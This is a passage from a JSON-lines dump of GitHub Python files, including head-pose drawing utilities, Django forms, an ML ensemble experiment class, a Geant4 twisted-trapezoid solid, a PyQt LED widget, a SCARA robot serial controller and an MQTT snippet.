str(item[0])\r\n return abb\r\n\r\ndef alphabetically_sorted(set):\r\n sorted_set = sorted(set)\r\n return sorted_set\r\n\r\n\r\nprint(\"1.Sorting Acronyms\")\r\nname_collector = []\r\nabb_collector = []\r\n\r\n# Get amount of name\r\nwhile True:\r\n try:\r\n name_amount = int(input(\"Enter amount of name: \"))\r\n break\r\n except ValueError:\r\n print(\"Input integer number only.\")\r\n continue\r\n\r\n# Get name for name_amount round\r\nfor count in range(name_amount):\r\n while True:\r\n temp_name = str(input(\"Enter name number \" + str(count + 1) + \": \"))\r\n for char in temp_name:\r\n if char.isnumeric():\r\n print(\"Number is not allow.\")\r\n break\r\n else:\r\n name_collector.append(temp_name)\r\n break\r\n\r\nfor word in name_collector:\r\n abb_collector.append(abbreviation(word))\r\n\r\nsorted_list = alphabetically_sorted(abb_collector)\r\n\r\nfor word in sorted_list:\r\n print(str(word))\r\n","repo_name":"PskPttw/The-Internship2021","sub_path":"Number01_Sorting_Acronyms.py","file_name":"Number01_Sorting_Acronyms.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19519849503","text":"import math\n\ndef is_prime(number):\n if number == 1: return False\n\n for i in range(2, number):\n if number % i == 0:\n return False\n \n return True\n\ndef filter_prime(numbers):\n primes = []\n for num in numbers:\n if is_prime(num):\n primes.append(num)\n\n return primes\n\nx = [1, 10, 9, 7, 4, 3, 5, 124, 41]\ny = filter_prime(x)\n\nfor i in y:\n print(i)\n","repo_name":"LilLandau/pp2-22B030313","sub_path":"tsis3/filter_prime.py","file_name":"filter_prime.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28936264445","text":"import os\nimport numpy as np\nimport cv2\nimport scipy.io as sio\nfrom math import cos, sin\nfrom imutils import face_utils\n\ndef get_list_from_filenames(file_path):\n with open(file_path) as f:\n lines = f.read().splitlines()\n return lines\n\ndef plot_pose_cube(img, yaw, pitch, roll, tdx=None, tdy=None, size=150.):\n # Input is a cv2 image\n # pose_params: (pitch, yaw, roll, tdx, tdy)\n # Where (tdx, tdy) is the translation of the face.\n # For pose we have [pitch yaw roll tdx tdy tdz scale_factor]\n\n p = pitch * np.pi / 180\n y = -(yaw * np.pi / 180)\n r = roll * np.pi / 180\n if tdx != None and tdy != None:\n face_x = tdx - 0.50 * size\n face_y = tdy - 0.50 * size\n else:\n height, width = img.shape[:2]\n face_x = width / 2 - 0.5 * size\n face_y = height / 2 - 0.5 * size\n\n x1 = size * (cos(y) * cos(r)) + face_x\n y1 = size * (cos(p) * sin(r) + cos(r) * sin(p) * sin(y)) + face_y\n x2 = size * (-cos(y) * sin(r)) + face_x\n y2 = size * (cos(p) * cos(r) - sin(p) * sin(y) * sin(r)) + face_y\n x3 = size * (sin(y)) + face_x\n y3 = size * (-cos(y) * sin(p)) + face_y\n\n # Draw base in red\n cv2.line(img, (int(face_x), int(face_y)), (int(x1),int(y1)),(0,0,255),3)\n cv2.line(img, (int(face_x), int(face_y)), (int(x2),int(y2)),(0,0,255),3)\n cv2.line(img, (int(x2), int(y2)), (int(x2+x1-face_x),int(y2+y1-face_y)),(0,0,255),3)\n cv2.line(img, (int(x1), int(y1)), (int(x1+x2-face_x),int(y1+y2-face_y)),(0,0,255),3)\n # Draw pillars in blue\n cv2.line(img, (int(face_x), int(face_y)), (int(x3),int(y3)),(255,0,0),2)\n cv2.line(img, (int(x1), int(y1)), (int(x1+x3-face_x),int(y1+y3-face_y)),(255,0,0),2)\n cv2.line(img, (int(x2), int(y2)), (int(x2+x3-face_x),int(y2+y3-face_y)),(255,0,0),2)\n cv2.line(img, (int(x2+x1-face_x),int(y2+y1-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(255,0,0),2)\n # Draw top in green\n cv2.line(img, (int(x3+x1-face_x),int(y3+y1-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(0,255,0),2)\n cv2.line(img, (int(x2+x3-face_x),int(y2+y3-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(0,255,0),2)\n cv2.line(img, (int(x3), int(y3)), (int(x3+x1-face_x),int(y3+y1-face_y)),(0,255,0),2)\n cv2.line(img, (int(x3), int(y3)), (int(x3+x2-face_x),int(y3+y2-face_y)),(0,255,0),2)\n\n return img\n\ndef draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 100):\n\n pitch = pitch * np.pi / 180\n yaw = -(yaw * np.pi / 180)\n roll = roll * np.pi / 180\n\n if tdx != None and tdy != None:\n tdx = tdx\n tdy = tdy\n else:\n height, width = img.shape[:2]\n tdx = width / 2\n tdy = height / 2\n\n # X-Axis pointing to right. drawn in red\n x1 = size * (cos(yaw) * cos(roll)) + tdx\n y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy\n\n # Y-Axis | drawn in green\n # v\n x2 = size * (-cos(yaw) * sin(roll)) + tdx\n y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy\n\n # Z-Axis (out of the screen) drawn in blue\n x3 = size * (sin(yaw)) + tdx\n y3 = size * (-cos(yaw) * sin(pitch)) + tdy\n\n cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)\n cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)\n cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)\n\n return img\n\n \ndef crop_face_loosely(shape, img, input_size):\n bbox, scale_x, scale_y = get_loosen_bbox(shape, img, input_size)\n crop_face = img[bbox[1]:bbox[3], bbox[0]:bbox[2]]\n crop_face = cv2.resize(crop_face, input_size)\n return crop_face\n\ndef get_loosen_bbox(shape, img, input_size):\n max_x = min(shape[2], img.shape[1])\n min_x = max(shape[0], 0)\n max_y = min(shape[3], img.shape[0])\n min_y = max(shape[1], 0)\n \n Lx = max_x - min_x\n Ly = max_y - min_y\n \n Lmax = int(max(Lx, Ly) * 2.0)\n \n delta = Lmax * 0.4\n \n center_x = (shape[2] + shape[0]) // 2\n center_y = (shape[3] + shape[1]) // 2\n start_x = int(center_x - delta)\n start_y = int(center_y - delta - 10)\n end_x = int(center_x + delta)\n end_y = int(center_y + delta - 10)\n \n if start_y < 0:\n start_y = 0\n if start_x < 0:\n start_x = 0\n if end_x > img.shape[1]:\n end_x = img.shape[1]\n if end_y > img.shape[0]:\n end_y = img.shape[0]\n\n scale_x = float(input_size[0]) / (end_x - start_x)\n scale_y = float(input_size[1]) / (end_y - start_y)\n return (start_x, start_y, end_x, end_y), scale_x, scale_y\n\n\ndef normalize_landmark_point(original_point, image_size):\n '''\n original_point: (x, y)\n image_size: (W, H)\n '''\n x, y = original_point\n x -= image_size[0] // 2\n y -= image_size[1] // 2\n x /= image_size[0]\n y /= image_size[1]\n return [x, y]\n\ndef unnormalize_landmark_point(normalized_point, image_size, scale=[1,1]):\n '''\n normalized_point: (x, y)\n image_size: (W, H)\n '''\n x, y = normalized_point\n x *= image_size[0]\n y *= image_size[1]\n x += image_size[0] // 2\n y += image_size[1] // 2\n x *= scale[0]\n y *= scale[1]\n return [x, y]\n\ndef unnormalize_landmark(landmark, image_size):\n image_size = np.array(image_size)\n landmark = np.multiply(np.array(landmark), np.array(image_size)) \n landmark = landmark + image_size / 2\n return landmark\n\ndef normalize_landmark(landmark, image_size):\n image_size = np.array(image_size)\n landmark = np.array(landmark) - image_size / 2\n landmark = np.divide(landmark, np.array(image_size))\n return landmark\n\ndef draw_landmark(img, landmark):\n im_width = img.shape[1]\n im_height = img.shape[0]\n img_size = (im_width, im_height)\n landmark = landmark.reshape((-1, 2))\n unnormalized_landmark = unnormalize_landmark(landmark, img_size)\n for i in range(unnormalized_landmark.shape[0]):\n img = cv2.circle(img, (int(unnormalized_landmark[i][0]), int(unnormalized_landmark[i][1])), 2, (0,255,0), 2)\n return img","repo_name":"vietanhdev/deep-head-pose-2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"70026028695","text":"from django import forms\nfrom django.contrib.auth.models import User\n\nfrom .models import *\n \nclass UserModelChoiceField(forms.ModelChoiceField):\n \n def __init__(self, queryset=None, empty_label=None, required=True):\n \n super(UserModelChoiceField, self).__init__(queryset=User.objects.none())\n self.queryset = User.objects.filter(profile__isnull=False)\n self.empty_label = empty_label\n self.required = required\n \n def label_from_instance(self, obj):\n return obj.profile.get_fullname()\n\nclass AssetIssuanceSearchForm(forms.Form):\n category = forms.ModelChoiceField(\n queryset=Category.objects.all(), \n empty_label='-- All --',\n required=False)\n employee = UserModelChoiceField(\n empty_label='-- All --',\n required=False)\n issue_status = forms.ChoiceField(\n choices=(\n (0, '-- Any --'), \n (1, 'Issued'), \n (2, 'Available')\n )\n )\nclass AssetIssuanceForm(forms.ModelForm):\n class Meta:\n model = AssetIssuance\n exclude = ('returned_date', 'return_comment')\n widgets = {\n 'asset': forms.HiddenInput()\n }\n employee = UserModelChoiceField()\n \nclass AssetReturnForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(AssetReturnForm, self).__init__(*args, **kwargs)\n self.fields['returned_date'].widget = forms.HiddenInput()\n self.fields['asset'].widget = forms.HiddenInput()\n self.fields['returned_date'].widget = forms.HiddenInput()\n \n class Meta:\n model = AssetIssuance\n exclude = ()\n widgets = {\n# 'return_date': forms.HiddenInput(),\n 'return_comment': forms.Textarea(attrs={'cols': 30, 'rows': 4}),\n 'asset': forms.HiddenInput(),\n 'employee': forms.HiddenInput(),\n }\n \nclass AssetAllocationFormOld(forms.Form):\n def __init__(self, *args, **kwargs):\n cat_id = kwargs.pop('category')\n super(AssetAllocationForm, self).__init__(*args, **kwargs)\n self.fields['asset'].queryset = Asset.objects.filter(\n category__id=cat_id if cat_id else 1)\n\n q = Category.objects.all()\n self.fields['category'].queryset = q\n self.fields['category'].initial = Category.objects.get(pk=cat_id)\n self.fields['category'].widget.attrs = {\n 'onChange': \"post({}, {});\".format(\n '\"/asset/allocation/new/\"',\n {'from_post': 1}\n )\n }\n \n category = forms.ModelChoiceField(\n queryset=Category.objects.none(),\n empty_label = None\n )\n asset = forms.ModelChoiceField(\n queryset = Asset.objects.none()\n )\n \n class Media:\n js = ('js/hrp.js', )","repo_name":"PregTech-c/Hrp_system","sub_path":"asset/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72581160852","text":"from utils import *\nfrom preprocessing import preprocess\nfrom windowfy import windowfy\nfrom featurizing import featurize\nfrom tfidf_featurizer import combine_features, tfidf_featurize\nfrom training import train, do_ensemble, do_train, evaluate_dl_time\nfrom training_traditional import train_and_evaluate\nfrom training_traditional import evaluate as evaluate_trad_time\nfrom eval_erisk import evaluate, ensemble_vote\nfrom IPython.display import display, Markdown\nfrom itertools import product\nimport tensorflow\nimport numpy as np\nimport time\n\ndl_model_names = [\"cnn_model\", \"lstm_model_32\", \"lstm_model_16\", \"lstm_model\"]\ntrad_model_names = [\"svm\", \"bayes\"]\n \ndef traverse(d):\n K,V = zip(*d.items())\n for v in product(*(v if isinstance(v,list) else traverse(v) for v in V)):\n yield dict(zip(K,v))\n\nclass Experiment():\n \n def __init__(self, models, ensemble_combinations, eval_filename, random_seed=42, name=None):\n self.models = models\n self.ensemble_combinations = ensemble_combinations\n self.eval_filename = eval_filename\n if name is None:\n self.name = time.process_time()\n else:\n self.name = name\n self.seed = random_seed\n self.set_seed(random_seed)\n \n \n def prepare_data(self, params):\n logger(\"PREPARING DATA FOR PARAMS {}\".format(params))\n self.train_users, self.y_train, self.test_users, self.y_test, self.train_samples, self.X_train, self.X_test = windowfy(window_size=params[\"feat_window_size\"], max_size=params[\"max_size\"], sample_weights_size=params[\"sample_weights_size\"], is_oversample=params[\"oversample\"], include_new_data=params[\"include_new_data\"], sampling_strategy=params[\"sampling_strategy\"], random_state=self.seed)\n self.feats_train, self.feats_test = featurize(calculate_feats=True, \n include_feats=params[\"include_feats\"],\n train_users=self.train_users, test_users=self.test_users,\n discretize=params[\"discretize\"], \n discretize_size=params[\"discretize_size\"],\n dis_strategy=params[\"dis_strategy\"], \n normalize=params[\"normalize\"],\n scale=params[\"scale\"])\n self.tfidf_train, self.tfidf_test = tfidf_featurize(self.train_users, self.test_users, max_features=params[\"tfidf_max_features\"])\n\n self.feats_train_comb, self.feats_test_comb = combine_features([self.tfidf_train, self.feats_train], [self.tfidf_test, self.feats_test])\n\n self.feats_train_comb = self.feats_train_comb.toarray()\n self.feats_test_comb = self.feats_test_comb.toarray() \n \n def train_and_evaluate_model(self, params, weights_combinations=None):\n self.y_preds = {}\n params[\"weights\"] = None\n for model_name in self.models:\n params[\"model\"] = model_name\n if model_name in trad_model_names:\n logger(\"TRAINING AND EVALUATING TRADITIONAL MODEL {}\".format(model_name))\n y_pred, classifier = train_and_evaluate(self.feats_train_comb, self.y_train, self.feats_test_comb, self.y_test, self.train_samples, classifier_name=model_name, strategy=\"weights\")\n t = time.process_time()\n logger(\"Evaluating after getting time {}\".format(t))\n evaluate_trad_time(classifier, self.feats_test_comb, self.y_test)\n elapsed_time = time.process_time() - t\n logger(\"Evaluated with elapsed time {}\".format(elapsed_time))\n else:\n logger(\"TRAINING AND EVALUATING DL MODEL {}\".format(model_name))\n y_pred = self.iterate_dl_model(params)\n logger(\"Evaluating for elapsed time\")\n elapsed_time = evaluate_dl_time(model_name=params[\"model\"], maxlen=params[\"maxlen\"], epochs=params[\"epochs\"],\n batch_size=params[\"batch_size\"],\n shuffle=params[\"shuffle\"], patience=params[\"patience\"], \n feats_train=self.feats_train, feats_test=self.feats_test, \n X_train=self.X_train, X_test=self.X_test, y_train=self.y_train, y_test=self.y_test, \n train_sample_weights=self.train_samples, name=self.name)\n logger(\"Evaluated with elapsed time {}\".format(elapsed_time))\n logger(\"EVALUATING FOR WINDOW SIZES 1, 2 AND 3 MODEL {}\".format(model_name))\n params[\"eval_time\"] = elapsed_time\n params[\"eval_window_size\"] = 1\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 2\n eval_resul = evaluate(2, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 3\n eval_resul = evaluate(3, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n \n self.y_preds[model_name] = y_pred\n\n for ensemble_ver in self.ensemble_combinations:\n if weights_combinations is None:\n weights_combinations = [[1,1,1]]\n \n for weights in weights_combinations:\n logger(\"EVALUATING ENSEMBLE {} with weights {}\".format(ensemble_ver, weights))\n ensemble_preds = [self.y_preds[model_name] for model_name in ensemble_ver]\n ensemble_preds = np.array(ensemble_preds)\n y_pred = ensemble_vote(ensemble_preds, weights)\n\n params[\"model\"] = ensemble_ver\n params[\"weights\"] = weights\n\n logger(\"EVALUATING ENSEMBLE {} WITH WEIGHTS {} FOR WINDOW SIZES 1, 2 AND 3\".format(ensemble_ver, weights))\n params[\"eval_window_size\"] = 1\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 2\n eval_resul = evaluate(2, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 3\n eval_resul = evaluate(3, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename) \n \n \n def iterate_dl_model(self, params):\n \n model_resuls = {}\n iterations = params[\"iterations\"]\n logger(\"STARTING ITERATION FOR DL MODEL {} FOR {} ITERATIONS\".format(params[\"model\"], params[\"iterations\"]))\n for i in range(0, iterations):\n y_pred = do_train(model_name=params[\"model\"], maxlen=params[\"maxlen\"], epochs=params[\"epochs\"],\n batch_size=params[\"batch_size\"],\n shuffle=params[\"shuffle\"], patience=params[\"patience\"], \n feats_train=self.feats_train, feats_test=self.feats_test, \n X_train=self.X_train, X_test=self.X_test, y_train=self.y_train, y_test=self.y_test, \n train_sample_weights=self.train_samples, name=self.name)\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, save=False)\n model_resuls[eval_resul['latency_weighted_f1']] = y_pred.flatten()\n\n return model_resuls[max(model_resuls.keys())]\n \n def set_seed(self, seed_num):\n np.random.seed(seed_num)\n tensorflow.random.set_seed(seed_num)\n logger(\"Initialized numpy random and tensorflow random seed at {}\".format(seed_num))","repo_name":"ele94/early-risk-ensemble","sub_path":"experiment_utils.py","file_name":"experiment_utils.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8017509037","text":"from ... import config as _config\n\nfrom .SolidBase import SolidBase as _SolidBase\nfrom .TwoVector import TwoVector as _TwoVector\nfrom .Layer import Layer as _Layer\nfrom .TwistedSolid import TwistedSolid as _TwistedSolid\n\nimport numpy as _np\nimport logging as _log\n\n\nclass TwistedTrd(_SolidBase, _TwistedSolid):\n \"\"\"\n Constructs a twisted general trapezoid.\n\n :param name: of solid\n :type name: str\n :param twistedangle: twist angle, must be less than 0.5*pi\n :type twistedangle: float, Constant, Quantity, Variable, Expression\n :param pDx1: length in x at surface positioned at -pDz/2\n :type pDx1: float, Constant, Quantity, Variable, Expression\n :param pDx2: length in x at surface positioned at +pDz/2\n :type pDx2: float, Constant, Quantity, Variable, Expression\n :param pDy1: length in y at surface positioned at -pDz/2\n :type pDy1: float, Constant, Quantity, Variable, Expression\n :param pDy2: length in y at surface positioned at +pDz/2\n :type pDy2: float, Constant, Quantity, Variable, Expression\n :param pDz: length in z\n :type pDz: float, Constant, Quantity, Variable, Expression\n :param refine: number of steps to iteratively smoothen the mesh by doubling the number of vertices at every step\n :type refine: int\n :param registry: for storing solid\n :type registry: Registry\n :param lunit: length unit (nm,um,mm,m,km) for solid\n :type lunit: str\n :param aunit: angle unit (rad,deg) for solid\n :type aunit: str\n :param nstack: number of theta elements for meshing\n :type nstack: int\n \"\"\"\n\n def __init__(\n self,\n name,\n twistedangle,\n pDx1,\n pDx2,\n pDy1,\n pDy2,\n pDz,\n registry,\n lunit=\"mm\",\n aunit=\"rad\",\n nstack=None,\n refine=0,\n addRegistry=True,\n ):\n super().__init__(name, \"TwistedTrd\", registry)\n\n self.twistedAngle = twistedangle\n self.pDx1 = pDx1\n self.pDx2 = pDx2\n self.pDy1 = pDy1\n self.pDy2 = pDy2\n self.pDz = pDz\n self.lunit = lunit\n self.aunit = aunit\n self.nstack = nstack if nstack else _config.SolidDefaults.TwistedTrap.nstack\n self.refine = refine\n\n self.dependents = []\n\n self.varNames = [\"twistedAngle\", \"pDx1\", \"pDx2\", \"pDy1\", \"pDy2\", \"pDz\"]\n self.varUnits = [\"aunit\", \"lunit\", \"lunit\", \"lunit\", \"lunit\", \"lunit\"]\n\n self.checkParameters()\n\n if addRegistry:\n registry.addSolid(self)\n\n def __repr__(self):\n return \"TwistedTrd : {} {} {} {} {} {} {}\".format(\n self.name,\n self.twistedAngle,\n self.pDx1,\n self.pDx2,\n self.pDy1,\n self.pDy2,\n self.pDz,\n )\n\n def __str__(self):\n return \"TwistedTrd : name={} twistedAngle={} dx1={} dx2={} dy1={} dy2={} dz={}\".format(\n self.name,\n self.twistedAngle,\n self.pDx1,\n self.pDx2,\n self.pDy1,\n self.pDy2,\n self.pDz,\n )\n\n def checkParameters(self):\n if self.evaluateParameterWithUnits(\"twistedAngle\") > _np.pi:\n msg = \"Twisted Angle must be less than 0.5*pi\"\n raise ValueError(msg)\n\n def makeLayers(self, pl1, pl2, pl3, pl4, pu1, pu2, pu3, pu4, pDz, theta, nsl):\n dz = 2 * pDz / nsl\n dtheta = theta / nsl\n z = -pDz\n\n layers = []\n\n bottom = _Layer(pl1, pl2, pl3, pl4, z)\n bottom = bottom.Rotated(-theta * 0.5) # overwrite\n layers.append(bottom)\n\n for i in range(nsl):\n pn1 = pl1 + float(i + 1) * (pu1 - pl1) / nsl\n pn2 = pl2 + float(i + 1) * (pu2 - pl2) / nsl\n pn3 = pl3 + float(i + 1) * (pu3 - pl3) / nsl\n pn4 = pl4 + float(i + 1) * (pu4 - pl4) / nsl\n\n z += dz # increment z\n n = _Layer(pn1, pn2, pn3, pn4, z)\n angle = -theta * 0.5 + float(i + 1) * dtheta\n nr = n.Rotated(angle) # returns rotated copy\n layers.append(nr)\n\n return layers\n\n def mesh(self):\n _log.info(\"twistedtrd.pycsgmesh> antlr\")\n\n import pyg4ometry.gdml.Units as _Units # TODO move circular import\n\n luval = _Units.unit(self.lunit)\n auval = _Units.unit(self.aunit)\n\n twistedAngle = self.evaluateParameter(self.twistedAngle) * auval\n pDx1 = self.evaluateParameter(self.pDx1) / 2.0 * luval\n pDx2 = self.evaluateParameter(self.pDx2) / 2.0 * luval\n pDy1 = self.evaluateParameter(self.pDy1) / 2.0 * luval\n pDy2 = self.evaluateParameter(self.pDy2) / 2.0 * luval\n pDz = self.evaluateParameter(self.pDz) / 2.0 * luval\n\n _log.info(\"twistedtrd.mesh> mesh\")\n pl1 = _TwoVector(-pDx1, -pDy1) # , pDz]\n pl2 = _TwoVector(pDx1, -pDy1) # pDz]\n pl3 = _TwoVector(pDx1, pDy1) # pDz]\n pl4 = _TwoVector(-pDx1, pDy1) # pDz]\n\n pu1 = _TwoVector(-pDx2, -pDy2) # , pDz]\n pu2 = _TwoVector(pDx2, -pDy2) # pDz]\n pu3 = _TwoVector(pDx2, pDy2) # pDz]\n pu4 = _TwoVector(-pDx2, pDy2) # pDz]pu1 = _TwoVector(-pDx2, -pDy2)\n\n m = self.makeLayers(pl1, pl2, pl3, pl4, pu1, pu2, pu3, pu4, pDz, twistedAngle, self.nstack)\n\n return self.meshFromLayers(m, self.nstack)\n","repo_name":"g4edge/pyg4ometry","sub_path":"src/pyg4ometry/geant4/solid/TwistedTrd.py","file_name":"TwistedTrd.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"71662870294","text":"from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import (QByteArray, QPointF, QRectF, QTimer,\n pyqtProperty, pyqtSlot)\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtSvg import QSvgRenderer\nimport os\nimport sys\n\n\nclass QLedWidget(QWidget):\n '''LED indicator\n\n ...\n\n Inherits\n --------\n PyQt5.QtWidgets.QWidget\n\n Properties\n ==========\n\n Colors\n ------\n RED, AMBER, GREEN, BLUE, VIOLET\n\n States\n ------\n ON, OFF\n\n color: Colors\n Color of the LED indicator\n state: States\n ON: LED is bright\n OFF: LED is dark\n blink: bool\n True: LED alternates between ON and OFF\n False: LED returns to its initial state\n interval: int\n Duration of each state during blinking\n in milliseconds\n '''\n\n RED = 1\n AMBER = 2\n GREEN = 3\n BLUE = 4\n VIOLET = 5\n\n OFF = 1\n ON = 2\n\n hexcodes = {RED: {OFF: ('#3f0000', '#a00000'),\n ON: ('#af0000', '#ff0f0f')},\n AMBER: {OFF: ('#aa4400', '#ad892c'),\n ON: ('#d45500', '#ffd42a')},\n GREEN: {OFF: ('#001c00', '#008200'),\n ON: ('#009400', '#00d700')},\n BLUE: {OFF: ('#102151', '#0a163c'),\n ON: ('#082686', '#0342eb')},\n VIOLET: {OFF: ('#45098f', '#471b7d'),\n ON: ('#5a00cc', '#a65fff')}}\n\n def __init__(self, *args,\n color=None,\n state=None,\n blink=None,\n interval=None,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.setMinimumSize(48, 48)\n self.sizePolicy().setWidthForHeight(True)\n self.template = self._get_template()\n self.renderer = QSvgRenderer()\n self.timer = QTimer()\n self.color = color or self.RED\n self.state = state or self.ON\n self.blink = blink or False\n self.interval = interval or 400\n self._connectSignals()\n\n @pyqtProperty(int)\n def color(self):\n return self._color\n\n @color.setter\n def color(self, value):\n self._color = value\n self.update()\n\n @pyqtProperty(int)\n def state(self):\n return self._state\n\n @state.setter\n def state(self, value):\n self._state = value\n self._setstate = value\n self.update()\n\n @pyqtProperty(bool)\n def blink(self):\n return self._blink\n\n @blink.setter\n def blink(self, blink):\n self._blink = blink\n if blink:\n self.timer.start(self.interval)\n else:\n self.timer.stop()\n self.state = self._setstate\n\n @pyqtProperty(int)\n def interval(self):\n return self._interval\n\n @interval.setter\n def interval(self, value):\n self._interval = abs(value)\n\n @pyqtSlot()\n def flipState(self):\n self.state = self.ON if self.state is self.OFF else self.OFF\n\n def _get_template(self):\n file = sys.modules[self.__module__].__file__\n dir = os.path.dirname(os.path.abspath(file))\n path = os.path.join(dir, 'QLedWidget.txt')\n with open(path, 'r') as f:\n template = f.read()\n return template\n\n def _connectSignals(self):\n self.timer.timeout.connect(self.flipState)\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing, True)\n hexcodes = self.hexcodes[self.color][self.state]\n _xml = self.template.format(*hexcodes).encode('utf-8')\n self.renderer.load(QByteArray(_xml))\n self.renderer.render(painter, self._bounds())\n\n def _bounds(self):\n x, y = self.size().width()/2., self.size().height()/2.\n dim = min(x, y)\n return QRectF(QPointF(x-dim, y-dim), QPointF(x+dim, y+dim))\n\n\nif __name__ == '__main__':\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n widget = QLedWidget()\n widget.color = widget.VIOLET\n widget.blink = True\n widget.show()\n sys.exit(app.exec_())\n","repo_name":"davidgrier/QInstrument","sub_path":"widgets/QLedWidget.py","file_name":"QLedWidget.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"31401092537","text":"# =============================== Errors Handling ===============================\r\n\r\n\r\n# try:\r\n# f = open(\"my_file.txt\", \"r\")\r\n \r\n# print(10/0)\r\n \r\n# except FileNotFoundError as e:\r\n# print(e)\r\n \r\n# except NameError as e:\r\n# print(e)\r\n\r\n# except Exception as e:\r\n# print(e)\r\n\r\n# else:\r\n# print(f.read())\r\n# f.close()\r\n\r\ntry:\r\n f = open(\"danger.txt\", \"r\")\r\n if f.name == \"danger.txt\":\r\n raise Exception\r\n \r\nexcept Exception as e:\r\n print(\"This file is corrupted.\")\r\nelse:\r\n print(f.read())\r\n f.close()\r\n\r\n\r\n","repo_name":"yahyaaly151989/freeCodeCamp","sub_path":"25_Errors_Handling.py","file_name":"25_Errors_Handling.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"35588373512","text":"#Proudly brought to you by IOIA/ReverbLand. For support please email Daniel Górny at dadmin.dgor@gmail.com\nfrom machine import UART\nimport time, re, gc\n\nclass Scara():\n sock = None\n\n def flush(self):\n r = self.sock.readline()\n print(\"flush:\", end=\"\")\n while r == None:\n time.sleep_ms(10)\n r = self.sock.readline()\n print(\".\", end=\"\")\n print(\"OK\")\n\n def send(self, what, flush=False):\n print(\"send\",what)\n self.sock.write(\"%s\"%what)\n if flush:\n self.flush()\n\n def readuntil(self, what, max=100):\n found = False\n retry = 0\n out = None\n while True:\n r = self.sock.read(4096)\n if r:\n #print(\"recv\",r)\n if what in r:\n found = True\n out = r\n break\n elif r==None:\n print(\".\", end=\"\")\n retry = retry + 1\n if retry == max:\n break\n time.sleep_ms(10)\n print(\"OK\")\n if found==False:\n print(\"Error in\", what, out)\n return (found, r)\n\n def __init__(self, addr):\n self.sock = UART(3, 115200)\n self.sock.writechar(4) #disconnect\n time.sleep(0.1)\n self.sock.write(\"C%s/23\\n\"%addr) #connect\n if self.readuntil(\"login:\")[0]==True:\n self.send(\"KCL\\n\")\n if self.readuntil(\"password:\")[0]==True:\n self.send(\"1111\\n\")\n if self.readuntil(\"User logged in\")[0]==True:\n self.send(\"SET DEFAULT przerzutki2\\r\\n\", flush=True)\n\n def set_flag(self, val):\n self.send(\"SET VAR FLAG_IN=%s\\r\\n\"%val, flush=True)\n\n def get_flag(self):\n self.send(\"SHOW VAR FLAG_OUT\\r\\n\\r\\n\")\n out = \"\"\n ret = self.readuntil(\"Storage:\", max=50)\n rep = [\"\\\\x1b m\",\"\\\\x1b r\",\"\\\\x1b#\",\"\\\\x1b\",\"[25;8\",\"H[04;\",\"r[23;01HD[22;64H51231H'\"]\n if ret[0]:\n out = str(ret[1])\n for x in rep:\n out = out.replace(x,\"\")\n out = out[out.find(\"=\")+1:]\n return out\n\n def move(self, x, y, angle):\n self.send(\"SET VAR POSIT=%s,%s,0,0,0,%s\\r\\n\"%(x,y,angle),flush=True)\n","repo_name":"reverbrick/projectV","sub_path":"mpy_openmv/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27428965986","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" \nPublish some messages to queue\n\"\"\"\nimport paho.mqtt.publish as publish\n\n\nmsgs = [{'topic': \"comandos/voz/camara\", 'payload': \"jump\"}]\n\n\nhost = \"localhost\"\n\n\nif __name__ == '__main__':\n # publish a single message\n string = {'comando': 'esquerda'}\n import json\n \n publish.single(topic=\"comandos/voz/camara\", payload= json.dumps(string), hostname=host)\n\n # publish multiple messages\n # 